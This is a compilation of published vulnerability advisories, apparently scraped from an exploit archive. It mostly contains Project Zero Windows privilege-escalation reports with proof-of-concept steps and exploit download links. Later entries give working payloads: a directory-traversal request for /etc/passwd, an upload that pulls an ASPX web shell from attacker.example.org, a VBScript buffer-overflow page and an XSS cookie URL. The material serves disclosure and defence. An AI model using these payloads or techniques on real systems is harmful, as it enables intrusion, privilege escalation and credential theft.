aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.

Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.

For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=461

Windows: NtUserGetClipboardAccessToken Token Leak Redux
Platform: Windows 8.1 Update, Windows 10 Build 10130
Class: Security Bypass/EoP

Summary:
The NtUserGetClipboardAccessToken win32k system call exposes the access token of the last user to lower-privileged users. It can also be used to open an anonymous impersonation thread token which normally OpenThreadToken shouldn't be able to do. This is a bypass of the fix for CVE-2015-0078.

Description:

This was supposedly fixed as CVE-2015-0078 in MS15-023 to prevent access to the token from any process running below medium IL. The check is roughly:

if(IsImmersiveBroker() || CheckAccessForIntegrityLevelEx(0x2000)) {
    ObOpenObjectByPointer(WinStationObject->ClipboardAccessToken, Access, TokenHandle);
}

This is possible to bypass because IsImmersiveBroker level is trivial to get. It seems Win32k sets the appropriate Win32Process flag when first initializing the process and converting it to a GUI thread. If the executable is signed by a Microsoft certificate and has a specially named section of “.imrsiv” the flag will be set, however this will be done regardless of the IL of the process. Therefore you can create a process using one of the pre signed executables, such as explorer.exe, RuntimeBroker.exe or LicensingUI.exe then inject a DLL into the process. This allows you to bypass the check and capture the token.

I’ve had a quick look at what else might be exploitable from being able to get IsImmersiveBroker to return true. Nothing stands out but it’s probably worth restricted the IL level of processes allowed to get this flag set.

Proof of Concept:

I’ve provided a PoC which will capture any token currently on the clipboard that it can access. It creates an instance of LicensingUI.exe and injects a DLL into it. Note the built executables are for x64 Windows, you'll need to rebuild to test on 32 bit. The password for the archive is "password".

1) Copy the PoC to a directory, including the executable and the DLL
2) Execute the Poc_NtUserGetClipboardAccessToken_SecurityBypass.exe as a low integrity process. You can do this by marking the executable file with low IL using icacls or by using psexec. 
3) Perform a clipboard operation, for example select some text and copy it to the clipboard
4) The PoC should show it has opened a token by opening a message dialog, if you inspect the tokens it’s likely to show a primary token has been captured with medium IL. 

Expected Result:
It shouldn’t be possible to capture the token.

Observed Result:
The token was captured in the low IL process.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38199.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=468

Windows: User Mode Font Driver Thread Permissions EoP
Platform: Windows 10 Build 10130
Class: Elevation of Privilege

Summary:
The host process for the UMFD runs as a normal user but with a heavily restrictive process DACL. It’s possible execute arbitrary code within the context of the process because it’s possible to access the processes threads leading to local EoP.

Description:

NOTE: This was tested on the latest available build on Windows 10. I don’t know if the final version will change the functionality to fix this vulnerability.

When a custom font is used in Windows 10 the User Mode Font Driver comes into play. This is initialized by a call from the kernel into the user sessions winlogon process which in turn spawns a new copy of fontdrvhost.exe. The process is started inside an appcontainer heavily restricting what resources it could access if a font bug was able to compromise it. However win32k exposes some additional calls to the UMFD for its own purposes, some of which are potentially dangerous. For that reason (presumably) winlogon creates the process with a specific DACL limiting access to the process and initial thread to SYSTEM only.

There’s a few problems with this approach, firstly it’s still running in the context of the user and includes the user’s environment variables such as PATH. This might mean if any badly written code later relies on the drive mapping or PATH there could be issues. More serious however is the specified DACL only applies to the process object and the initial thread object, but not to any subsequent thread. Therefore those threads get the default DACL from the process token (which is never changed) and are marked as owned by the current user, so the DACL could be rewritten anyway. This is a problem as with write access to the threads it’s possible to change their context and redirect execution to an arbitrary location. As the token is a lowbox token this can even be done in low integrity processes such as IE PM. 

The exploitation is made trickier by the fact that you can’t directly read or write the process’ memory. Still one thing you could do is redirect the thread to LoadLibraryW and pass it the known address of a string. This can either be a string in a loaded library and rely on the path environment variable to allow it to be resolved or in something like the GDI heap.

Once in the UMFD process you can then send some of the specific Win32k escape codes. For example there’s one currently called UmfdEscEngCreateFile which will open (for read or write) a couple of files in system32. The open is done in kernel mode, with no forced access check (even though an impersonation is performed) and the handle returned to user mode. This is dangerous for a number of reasons, specifically that the NTFS driver will mark the file as having create symbolic link permissions because it’s opened in kernel mode which means the caller could set a file symbolic link. Then it could reopen the file and it would be able create an arbitrary file on disk. This hasn’t been completely tested however but it’s an example of a dangerous call, of course it could just be a vestigial feature which will be removed in release builds as the code is pretty dangerous and doesn’t even work as expected. 

This issue could probably be fixed in a few ways, firstly the default token DACL should be set so that it maintains the security, assuming this is possible. Also you’d probably need to set OWNER_RIGHTS SID otherwise the user could just open the thread and rewrite its DACL. Also not using the actual user’s environment would probably be a good idea although not necessarily a complete fix. Finally presumably the process mitigation to only allow signed modules could be enabled which would complicate exploitation especially in the presence of CFG. 

Proof of Concept:

I’ve provided a PoC which just crashes the fontdrvhost process at a predictable address. It’s only built for 32 bit version of Windows 10 but presumably it would work on 64 bit version as well. The password for the archive is "password".

1) Copy the PoC to a directory
2) Execute the PoC, if it wasn’t already a new instance of fontdrvhost.exe should have started. You might want to attach a debugger at this point.
3) Click the Do Exploit button, if at this point the fontdrvhost process doesn’t crash open a new copy of the PoC just to kick the threads inside the process.  

Expected Result:
It’s not possible to influence the fontdrvhost process.

Observed Result:
Thread execution redirected to an arbitrary address of 0x55555555.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38198.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=442

Windows: Task Scheduler DeleteExpiredTaskAfter File Deletion Elevation of Privilege
Platform: Windows 8.1 Update, looks like it should work on 7 and 10 as well
Class: Elevation of Privilege

Summary:
The Task Scheduler can be made to delete a task after it’s trigger has expired. No check is made to ensure the task file is not a junction which allows arbitrary files to be deleted by the system user leading to EoP.

Description:

If a scheduled task is configured with DeleteExpiredTaskAfter setting the service will delete the task including its task file after the triggers have expired. It does the deletion in a timer callback thread but doesn’t call DeleteFile with the privileges of the task, instead running at local system. While the scheduler now seems to do some checking on the path for junction attacks this only seems to be at creation time not when it’s deleting the task file. Therefore you can mount a junction attack against the deletion process which allows you to delete any file or directory on the system which local system can delete. To delete directories you’d have to use a more advanced trick than just a directory junction as you’d need to the point the task file to name::$INDEX_ALLOCATION but it will work. 

The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.

Proof of Concept:

The PoC demonstrates the vulnerability deleting an arbitrary file from the system. You need to modify the $filetodelete variable to select a different file to test other than c:\protected\test

1) Copy the PoC to a location on a local hard disk and rename the file’s extension to .ps1.
2) Enable powershell scripting for the current user, this doesn’t affect the actual exploit, it’s just to get powershell to execute the script. 
2) As a normal user execute the powershell PoC
3) The PoC should complete execution.

Expected Result:
The service should detect the directory junction and not delete the target file

Observed Result:
The target file is deleted

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38200.ps1
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=437

Windows: CreateObjectTask SettingsSyncDiagnostics Elevation of Privilege
Platform: Windows 8.1 Update (I don’t believe it’s available in earlier Windows versions)
Class: Elevation of Privilege

Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the SettingsSyncDiagnostics COM object. This object doesn’t take into account the caller when copying logs files leading to EoP.

Description:

The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is a diagnostic class for setting synchronization implemented in SettingSync.dll. 

This class allows an event log to be initialized with the StartLogging method and then the logs copied to an arbitary location with the StopLogging method. The StopLogging method doesn’t impersonate the caller when moving the logs to the user defined location which means it runs as local system. It’s possible to use this to copy the log files to arbitrary locations using appropriate symbolic link attacks. We can get data into the log file by sending trace events to the appropriate provider, this could allow string data to be added to the file. The name of the file is under attacker control so it can be renamed to .hta or .ps1 which would allow the limited control over the contents to be abused in error tolerant script engines. 

Another way of exploiting this takes into account that the SHFileOperations call which moves the file resets the ACLs (where applicable) on the file to match the expected inherited permissions. So for example you could drop the file as c:\program.exe and it would pick up the default DACL for C:\ (which allows Authenticated Users modify permissions) but the call doesn’t reapply the High IL label. This could be used indirectly in bad system services with unquoted file paths as the normal user could re-write the files contents to an malicious executable. A second trick with this is there’s a race between the move and the resetting of the ACLs. As the shell uses TreeSetNamedSecurityInfo it will also walk directory hierarchies, therefore by switching the symlink from the original target to a directory (say c:\users) you can force parts of the system drive to reset their ACLs, leading to the user being able to modify new parts of the file system which again could be exploited.. 

Exploitation is complicated somewhat by a bug in the proxy in actxprxy.dll. Presumably in the original MIDL file for the COM object the StopLogging method is incorrectly marked, the single WCHAR* parameter is missing the [string] attribute. This results in the built-in proxy only marshalling a single WCHAR to the server, this tends to cause things to not work so well and leads to a limited information disclosure as whatever’s after the single character in memory up to the next NUL is assumed to be part of the path. Fortunately the stub is sufficiently simple that by sending a plain array buffer to the server it’ll pick up the correct data. I’ve done this in the PoC by implementing my own custom COM proxy object. 

Proof of Concept:

The PoC demonstrates the vulnerability by copying the log file to the system drive. The password for the 7z file is ‘password’. 

1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC. 
3) The PoC should complete execution. 

Expected Result:
The log file should fail to be moved to the specified target.

Observed Result:
The log file ends up copied to c:\program.exe and can be modified by the current user. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38202.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=439

Windows: CreateObjectTask TileUserBroker Elevation of Privilege
Platform: Windows 8.1 Update (I don’t believe it’s available in earlier Windows versions)
Class: Elevation of Privilege

Summary:
The CreateObjectTask scheduled task initializes a user accessible system COM service which allows you to instantiate the TileUserBroker COM object. This object doesn’t take into account the caller when writing and deleting files leading to EoP.

Description:

The Microsoft\Windows\Shell\CreateObjectTask initializes a shell32 based ICreateObject COM server as local system. This is marked as being accessible from a normal user account so once created we can attach to it. The server only has one method, CreateObject which checks the CLSID against a list of known safe classes before allowing it to be instantiated. One of these classes is allows a user to set their account picture for the logon screen.

By calling CUserTileBroker::SetUserTile (implemented in Windows.UI.Immersive.dll) we can get the system service to write the account pictures to c:\users\public\AccountPictures\SID. Once the files are written it will try and delete any file not expected in that folder, this is done as the system user. We can abuse this functionality by placing a junction where the SID component is and point it to an arbitrary location. This would allow us to delete arbitrary files on the system or potentially replace a file with the one of the JPEGs (which are reencoded). Replacing files is trickier as the file names have a random GUID attached, however the service writes 5 files, so there’s a race condition where the GUID could be read from one of those files then used to redirect the writes. Also the rencoding might make it difficult to inject any meaningful content. 

If a user has not configured an account picture before (which probably means only local/domain users rather than Microsoft accounts) then the folder c:\users\public\AccountPictures\SID doesn’t exist. Even if another user has set their picture on the same machine the AccountPictures directory has sufficient permissions to add a new directory in its place. If the user has configured their account picture then this will not work as the directory permissions of the SID directory are very restrictive. 

The ability to deletes files is sufficient in some cases to elevate privileges because of the behaviour of other system processes and default permissions. For example system files created in ProgramData generally have privileges which prevent a user from modifying or replacing files, but not from creating new ones. You could use the attack to delete existing files then replace with hardlinks to overwrite system files.

Proof of Concept:

The PoC demonstrates the vulnerability deleting the file contents of an arbitrary directory passed on the command line. The password for the 7z file is ‘password’. 

1) Extract the PoC to a location on a local hard disk
2) As a normal user execute the PoC pass the path to the directory to delete as the first parameter. For example poc.exe c:\windows\temp
3) The PoC should complete execution. 

NOTE: If Access Denied is printed then it’s probably that the account picture has already been setup on the machine which makes the exploit not work. 

Expected Result:
The system service should determine that it cannot delete the contents of the picture directory

Observed Result:
The passed path has all its files deleted (assuming they can be accessed by local system). 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38201.zip
HireHackking 
source: https://www.securityfocus.com/bid/57237/info

Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.

Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected. 

GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1
HireHackking 
source: https://www.securityfocus.com/bid/57242/info

Prizm Content Connect is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Prizm Content Connect 5.1 is vulnerable; other versions may also be affected. 

Proof of concept

First, the attacker causes the Prizm Content Connect software to download
the malicious ASPX file:

http://www.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx

The resulting page discloses the filename to which the ASPX file was
downloaded, e.g.:

Document Location: C:\Project\

Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx

Temp Location: C:\tempcache\

The attacker then requests the ASPX shell from the root of the website:

http://www.example.com/ajwyfw45itxwys45fgzomrmv.aspx
HireHackking 
source: https://www.securityfocus.com/bid/57249/info

Samsung Kies is prone to a remote buffer-overflow vulnerability because it fails to properly validate user-supplied input before copying it into a fixed-length buffer.

Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition. 

<html>
<!-- (c)oded by High-Tech Bridge Security Research Lab -->
<head>
<title>Remote Buffer Overflow Vulnerability in Samsung Kies v. 
2.5.0.12114_1 </title>
</head>
<script language='vbscript'>
Sub PoC()
arg1="defaultV"
arg2=String(14356, "A")
arg3=1
arg4=1
Target.PrepareSync arg1 ,arg2 ,arg3 ,arg4
End Sub
</script>
<body>
<h3>Remote Buffer Overflow Vulnerability in Samsung Kies by High-Tech 
Bridge Security Research Lab</h3>
<input language=VBScript onclick=PoC() type=button value="Proof of 
Concept">
</body>
<object 
classid='clsid:EA8A3985-F9DF-4652-A255-E4E7772AFCA8'id='Target'></object>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/57254/info

Quick.Cms and Quick.Cart are prone to a cross-site scripting vulnerability because they fail to sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

The following products are vulnerable:

Quick.Cms 5.0
Quick.Cart 6.0 

http://www.example.com/admin.php/')"></select><script>alert(document.cookie);</script>/